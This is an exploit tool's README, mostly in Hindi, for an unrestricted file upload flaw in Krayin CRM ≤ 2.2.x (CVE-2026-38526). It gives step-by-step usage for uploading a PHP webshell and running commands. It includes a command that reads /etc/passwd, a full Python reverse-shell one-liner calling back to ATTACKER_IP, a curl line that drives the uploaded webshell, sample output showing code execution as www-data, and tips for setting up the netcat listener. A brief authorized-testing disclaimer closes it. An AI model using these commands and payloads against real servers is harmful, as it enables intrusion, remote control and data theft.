
Automated exploit for Krayin CRM ≤ 2.2.x.
Krayin CRM ≤ 2.2.x के लिए स्वचालित एक्सप्लॉइट। यह स्क्रिप्ट TinyMCE एंडपॉइंट (/admin/tinymce/upload) में असीमित फ़ाइल अपलोड भेद्यता का शोषण करती है, image/jpeg का रूप धारण करके MIME-प्रकार सत्यापन को बायपास करती है, एक PHP वेबशेल अपलोड करती है, और वेब सर्वर विशेषाधिकारों के साथ मनमाने कमांड निष्पादित करती है।
| गुण | मान |
|---|---|
| CVE ID | CVE-2026-38526 |
| प्रभावित सॉफ़्टवेयर | Krayin CRM ≤ 2.2.x |
| भेद्यता प्रकार | असीमित फ़ाइल अपलोड → रिमोट कोड निष्पादन |
| प्रमाणीकरण | आवश्यक (कोई भी मान्य व्यवस्थापक खाता) |
| एंडपॉइंट | POST /admin/tinymce/upload |
requests लाइब्रेरीgit clone https://github.com/b0nyo/CVE-2026-38526.git
cd CVE-2026-38526
pip3 install -r requirements.txt
python3 CVE-2026-38526.py -i <TARGET_URL> -u <USERNAME> -p <PASSWORD> [-c <COMMAND>]
# Basic check
python3 CVE-2026-38526.py -i http://target.com -u [email protected] -p "AdminPassword123!"
# Custom command
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "cat /etc/passwd"
# Reverse shell
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'"
/admin/tinymce/upload पर अपलोड करें[*] Target: http://target.com
[*] Username: [email protected]
[*] Authenticating...
[+] Authentication successful
[*] Uploading webshell...
[+] Webshell uploaded: http://target.com/storage/tinymce/abc123def456.php
[+] CVE-2026-38526 CONFIRMED - Remote Code Execution
[*] Executing: id
[*] Output:
────────────────────────────────────────────────────────────────────
uid=33(www-data) gid=33(www-data) groups=33(www-data)
────────────────────────────────────────────────────────────────────
[*] Manual execution (curl):
curl 'http://target.com/storage/tinymce/abc123def456.php?cmd=id'
प्रमाणीकरण विफल: सत्यापित करें कि क्रेडेंशियल्स सही हैं और खाता लक्ष्य पर मौजूद है।
CSRF टोकन निष्कर्षण विफल: सुनिश्चित करें कि लक्ष्य कमजोर Krayin CRM चला रहा है और लॉगिन एंडपॉइंट सुलभ है।
रिवर्स शेल कनेक्ट नहीं हो रहा: सुनिश्चित करें कि आपका लिसनर चल रहा है (nc -lvnp <PORT>), फ़ायरवॉल नियम आउटबाउंड कनेक्शन की अनुमति देते हैं, और पेलोड में IP/पोर्ट सही हैं।
यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। किसी भी लक्षित सिस्टम का परीक्षण करने से पहले उचित प्राधिकरण सुनिश्चित करने की पूरी ज़िम्मेदारी उपयोगकर्ताओं की है। इस टूल के दुरुपयोग या इससे होने वाली क्षति के लिए लेखक कोई दायित्व नहीं लेता है।
b0nyo - PoC कार्यान्वयन
TREXNEGRO - भेद्यता खोज
| फ़्लैग | विवरण | उदाहरण |
|---|
-i | लक्षित URL (http:// के साथ या उसके बिना) | http://target.com या target.com |
-u | व्यवस्थापक ईमेल/उपयोगकर्ता नाम | [email protected] |
-p | व्यवस्थापक पासवर्ड | AdminPassword123! |
-c | निष्पादित करने के लिए कमांड (डिफ़ॉल्ट: id) | whoami |